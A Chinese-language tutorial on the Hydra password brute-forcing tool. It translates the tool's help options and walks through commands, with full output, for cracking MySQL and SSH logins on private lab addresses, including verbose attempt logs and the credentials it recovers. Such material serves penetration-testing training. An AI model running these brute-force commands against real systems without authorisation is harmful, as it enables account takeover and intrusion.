Hydra 使用教程

一：简介

Hydra 是一款非常强大的暴力破解工具，可以利用它对众多协议进行口令、账号、密码的爆破，支持FTP、MySQL、SMTP、TELNET、SSH等众多的协议爆破。

Hydra 是一个验证性质的工具，主要目的是：展示安全研究人员从远程获取一个系统认证权限。

二：基础指令

2.1 概述

hydra

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra v9.3 2022的作者：van Hauser/THC & David Maciejak。请不要在军事或者特情局组织中使用，或者用于非法目的（这是非约束性的，反正这些****无视法律和道德）

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
语法：hydra ...
hydra [ [-l LOGIN|-L FILE] [-p PASS|-P FILE] ]
hydra [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
选项：
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -l 登录名 或者 -L 文件  登录使用一个登录名，或者从文件中加载多个登录
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -p 密码 或者 -P 文件	尝试密码登录，或者从文件中加载多个密码
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -C 文件		冒号分隔格式 "login:pass"，而不是 -L/-P 选项
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -M 文件		要攻击的服务器列表，每行一个条目，使用':'去指定端口
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -t 线程数	运行任务在每一个目标的并行连接数（默认值：16）
  -U        service module usage details
  -U		服务模块使用详情
  -m OPT    options specific for a module, see -U output for information
  -m 选项		特定于模块的选项，使用 -U 查看输出详细信息
  -h        more command line options (COMPLETE HELP)
  -h		更多命令行选项（完整帮助）
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  服务器		目标DNS，IP 或者 网关 192.168.0.0/24（此选项或者 -M 选项）
  service   the service to crack (see below for supported protocols)
  服务		要破解的服务（有关支持的协议，请参见下文）
  OPT       some service modules support additional input (-U for module help)
  选项		一些支持附加输入的服务模块（-U 表示模块帮助）

Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
支持的服务：...

Hydra is a tool to guess/crack valid login/password pairs.
Hydra 是一个 猜测/破解 有效 登录/密码对 的工具。
Licensed under AGPL v3.0. The newest version is always available at;
根据AGPL v3.0许可，最新版本可以从以下网址获取：
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
请不要使用在军事或者密码服务组织中使用，否则为非法目的。（这是一个愿望，没有约束力，大多数这样的人不关心法律和道德，告诉自己他们是好的。）

Example:  hydra -l user -P passlist.txt ftp://192.168.0.1
示例：hydar ...

2.2 破解MySQL

（1）指定 IP 端口破解

# hydra -L 登录账户薄 -P 密码薄 mysql://目标IP:mysql端口号
hydra -L ./login.txt -P ./passwd.txt mysql://192.168.1.106:3306

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-26 14:23:55
Hydra 开始于 2022-11-26 14:23:55
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
信息：将任务数量减少到4（mysql不喜欢多并行连接）
[DATA] max 4 tasks per 1 server, overall 4 tasks, 15 login tries (l:3/p:5), ~4 tries per task
数据：每台服务器最多4个任务，总共4个任务，15次登录尝试（l:3/p:5）,每个任务约4次尝试
[DATA] attacking mysql://192.168.1.106:3306/
数据：攻击 mysql://192.168.1.106:3306/
[3306][mysql] host: 192.168.1.106   login: root   password: root
1 of 1 target successfully completed, 1 valid password found
1个目标中1个成功完成，找到一个有效密码。
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-26 14:23:56
Hydra 完成于 2022-11-26 14:23:56

（2）默认端口破解

# 如果服务使用的是默认端口，那么指令也可以这样写
# hydra -L ./login.txt -P ./passwd.txt 目标IP mysql
hydra -L ./login.txt -P ./passwd.txt 192.168.1.106 mysql       
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-26 14:55:38
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 15 login tries (l:3/p:5), ~4 tries per task
[DATA] attacking mysql://192.168.1.106:3306/
[3306][mysql] host: 192.168.1.106   login: root   password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-26 14:55:38

（3）展示爆破过程

# 展示爆破过程，添加指令 -V
hydra -L ./login.txt -P ./passwd.txt -V  mysql://192.168.1.106:3306 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-26 15:00:51
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 15 login tries (l:3/p:5), ~4 tries per task
[DATA] attacking mysql://192.168.1.106:3306/
[ATTEMPT] target 192.168.1.106 - login "ghost" - pass "123456" - 1 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.1.106 - login "ghost" - pass "abcdefg" - 2 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.1.106 - login "ghost" - pass "admin" - 3 of 15 [child 2] (0/0)
[ATTEMPT] target 192.168.1.106 - login "ghost" - pass "root" - 4 of 15 [child 3] (0/0)
[ATTEMPT] target 192.168.1.106 - login "ghost" - pass "987654" - 5 of 15 [child 2] (0/0)
[ATTEMPT] target 192.168.1.106 - login "root" - pass "123456" - 6 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.1.106 - login "root" - pass "abcdefg" - 7 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.1.106 - login "root" - pass "admin" - 8 of 15 [child 2] (0/0)
[ATTEMPT] target 192.168.1.106 - login "root" - pass "root" - 9 of 15 [child 3] (0/0)
[ATTEMPT] target 192.168.1.106 - login "root" - pass "987654" - 10 of 15 [child 1] (0/0)
[3306][mysql] host: 192.168.1.106   login: root   password: root
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "123456" - 11 of 15 [child 3] (0/0)
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "abcdefg" - 12 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "admin" - 13 of 15 [child 1] (0/0)
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "root" - 14 of 15 [child 2] (0/0)
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "987654" - 15 of 15 [child 3] (0/0)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-26 15:00:51

2.3 ssh 破解

# hydra -L 登录薄 -P 密码薄 -t 线程数 ssh://目标ip
hydra -L ./login.txt -P ./passwd.txt -t 4 ssh://192.168.80.129

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-26 16:02:31
[DATA] max 4 tasks per 1 server, overall 4 tasks, 9 login tries (l:3/p:3), ~3 tries per task
[DATA] attacking ssh://192.168.80.129:22/
[22][ssh] host: 192.168.80.129   login: ghost   password: root
[22][ssh] host: 192.168.80.129   login: root   password: root
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-26 16:02:50